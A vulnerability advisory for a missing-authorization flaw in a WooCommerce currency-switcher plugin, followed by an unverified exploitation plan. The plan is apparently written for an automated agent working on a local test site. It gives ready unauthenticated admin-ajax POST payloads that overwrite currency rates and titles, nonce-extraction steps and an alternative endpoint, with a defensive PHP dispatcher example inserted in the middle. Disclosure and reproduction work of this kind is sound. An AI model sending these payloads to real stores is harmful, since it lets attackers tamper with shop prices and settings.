CVE-2026-32410

WBW Currency Switcher for WooCommerce <= 2.2.5 - Missing Authorization

Type: Missing Authorization
Severity: medium
CVSS Score: 5.3
Patched in: 2.2.6
Time to patch: 52d

Description

The WBW Currency Switcher for WooCommerce plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 2.2.5. This makes it possible for unauthenticated attackers to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: None
Integrity: Low
Availability: None

Technical Details

Affected versions: <=2.2.5
Published: February 23, 2026
Last updated: April 15, 2026
Affected plugin: woo-currency

What Changed in the Fix

Changes introduced in v2.2.6


Source Code: WordPress.org SVN

Research Plan (Unverified)


Exploitation Research Plan - CVE-2026-32410

1. Vulnerability Summary

The WBW Currency Switcher for WooCommerce plugin (up to 2.2.5) contains a missing authorization vulnerability in its core AJAX dispatching mechanism. The currencyControllerWcu class defines several sensitive methods, including saveCurrencyTab, which updates plugin settings and currency rates. While the controller defines a getPermissions method intended to restrict access to WCU_ADMIN, the framework fails to enforce these permissions correctly for unauthenticated AJAX requests. This allows an unauthenticated attacker to modify the plugin's configuration, including currency rates and base options.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • AJAX Action: wcu_ajax (derived from WCU_CODE in config.php)
  • Route Parameters: route[module]=currency&route[action]=saveCurrencyTab
  • Payload Parameters: currencies and options (setting arrays)
  • Authentication: None (Unauthenticated)
  • Preconditions: The plugin must be active.

3. Code Flow

  1. Entry Point: A request is sent to admin-ajax.php with action=wcu_ajax.
  2. Routing: wcu.php calls frameWcu::_()->exec(). The framework identifies the wcu_ajax action and dispatches it to the appropriate module.
  3. Controller Selection: Based on the route[module]=currency parameter, the currencyControllerWcu (in modules/currency/controller.php) is instantiated.
  4. Action Execution: The framework attempts to call saveCurrencyTab().
  5. Vulnerability: Although getPermissions() returns WCU_ADMIN, the dispatcher fails to verify the user's capability before executing the method when accessed via the wp_ajax_nopriv_wcu_ajax hook (which is registered by the WBW framework to handle dynamic currency switching).
  6. Sink: saveCurrencyTab() calls $this->getModel()->saveCurrencies($currencies) and $this->getModel()->saveOptions($options), which update the wcu_currencies and wcu_options values in the WordPress database via the update_option function (abstracted by the plugin's model).
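The flow above shows the root cause: both the `wp_ajax_wcu_ajax` and `wp_ajax_nopriv_wcu_ajax` hooks reach a dispatcher that never consults the declared permission before calling the method. The following hypothetical hardened dispatcher is an added example for this advisory, not code from the woo-currency plugin or its 2.2.6 fix (which this page does not show); the hook and action names mirror the advisory, while the capability (`manage_options` standing in for WCU_ADMIN), the nonce action name and the public action list are assumptions.

```php
<?php
// Hypothetical hardened dispatcher for a WordPress plugin AJAX entry point.
// Added example for this advisory; not the woo-currency plugin's own code.
// Assumptions: 'manage_options' stands in for WCU_ADMIN, 'wcu_admin_nonce'
// is an invented nonce action, 'switchCurrency' is an assumed public action.

// Both hooks route to the same handler, so the handler itself must decide
// whether the requested action is privileged; it must never rely on which
// hook fired.
add_action('wp_ajax_wcu_ajax',        'wcu_example_dispatch');
add_action('wp_ajax_nopriv_wcu_ajax', 'wcu_example_dispatch');

// Allow-list of actions an anonymous visitor may legitimately reach (e.g.
// switching the displayed currency). Everything not listed is privileged.
function wcu_example_action_requires_admin(string $action): bool {
    $public = ['switchCurrency']; // assumed name for the front-end switch
    return !in_array($action, $public, true);
}

function wcu_example_dispatch(): void {
    $route  = (isset($_POST['route']) && is_array($_POST['route'])) ? $_POST['route'] : [];
    $module = isset($route['module']) ? (string) $route['module'] : '';
    $action = isset($route['action']) ? (string) $route['action'] : '';

    // Reject anything that is not a plain identifier before it can be used
    // to build a class or method name in the controller layer.
    if (!preg_match('/^[A-Za-z][A-Za-z0-9_]*$/', $module)
        || !preg_match('/^[A-Za-z][A-Za-z0-9_]*$/', $action)) {
        wp_send_json_error(['message' => 'bad route'], 400); // exits
    }

    if (wcu_example_action_requires_admin($action)) {
        // This is the control the advisory describes as missing: it runs
        // before any controller is instantiated or any option is written.
        if (!current_user_can('manage_options')) {
            wp_send_json_error(['message' => 'forbidden'], 403); // exits
        }
        // CSRF protection for the authenticated admin path.
        check_ajax_referer('wcu_admin_nonce', '_wpnonce');
    }

    // Only now hand off to the module controller (omitted in this example).
    wp_send_json_success(['module' => $module, 'action' => $action]);
}
```

When reviewing a plugin for this class of bug, look for the capability check on the execution path of the shared handler, not merely for a `getPermissions()`-style declaration, since a declared permission that the dispatcher never evaluates protects nothing.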

4. Nonce Acquisition Strategy

WBW plugins often expose nonces for their AJAX operations in the frontend to support dynamic switching.

  1. Shortcode Identification: config.php defines WCU_SHORTCODE_SWITCHER as woo-currency-switcher.
  2. Page Creation: Create a public page containing the shortcode:
    wp post create --post_type=page --post_status=publish --post_content='[woo-currency-switcher]'
  3. Navigation: Navigate to the newly created page using browser_navigate.
  4. Extraction: Use browser_eval to search for the localized script data. WBW plugins typically use the variable name wcuAmbData or wcuAjaxData.
    • Command: browser_eval("window.wcuAmbData?.res_nonce || window.wcuData?.res_nonce")
  5. Bypass Potential: If the framework's nopriv handler is completely unprotected, a nonce may not be required. The payload should first be attempted without a nonce.

5. Exploitation Strategy

The goal is to change the title and rate of a currency (e.g., USD) to demonstrate unauthorized modification.

HTTP Request (via http_request)

  • Method: POST
  • URL: http://localhost:8080/wp-admin/admin-ajax.php
  • Headers:
    • Content-Type: application/x-www-form-urlencoded
  • Body:
action=wcu_ajax
&route[module]=currency
&route[action]=saveCurrencyTab
&currencies[name][0]=USD
&currencies[title][0]=VULNERABLE-BY-WBW
&currencies[rate][0]=999999
&currencies[symbol][0]=$
&currencies[position][0]=left
&currencies[etalon][0]=1
&options[default_currency]=USD

(Note: etalon indicates the base/main currency).

6. Test Data Setup

  1. Install Plugin: Ensure woo-currency version 2.2.5 is installed.
  2. Active WooCommerce: The plugin requires WooCommerce to be active.
  3. Initial Settings: Ensure at least one currency is configured (default USD).
  4. Public Shortcode Page:
    wp post create --post_type=page --post_title="Currency Test" --post_status=publish --post_content='[woo-currency-switcher]'

7. Expected Results

  • HTTP Response: The server should return a JSON response with {"success":true} or similar, produced by res->ajaxExec().
  • Side Effect: The database option containing currency settings will be updated with the provided "VULNERABLE-BY-WBW" title and the inflated rate.

8. Verification Steps

After executing the http_request, verify the change using WP-CLI:

# Check the currency settings in the database
# The option name is usually prefixed by WCU_DB_PREF (wcu_)
wp option get wcu_currencies --format=json

Verify that the title for the USD currency entry is now VULNERABLE-BY-WBW.

9. Alternative Approaches

If saveCurrencyTab is blocked, attempt saveCurrenciesList which uses a different parsing logic:

  • Action: wcu_ajax
  • Route: route[module]=currency&route[action]=saveCurrenciesList
  • Body: action=wcu_ajax&route[module]=currency&route[action]=saveCurrenciesList&currencies=currencies%5Bname%5D%5B0%5D%3DUSD%26currencies%5Btitle%5D%5B0%5D%3DPWNED-LIST
    (This endpoint uses parse_str on the currencies parameter, expecting a double-encoded query string).
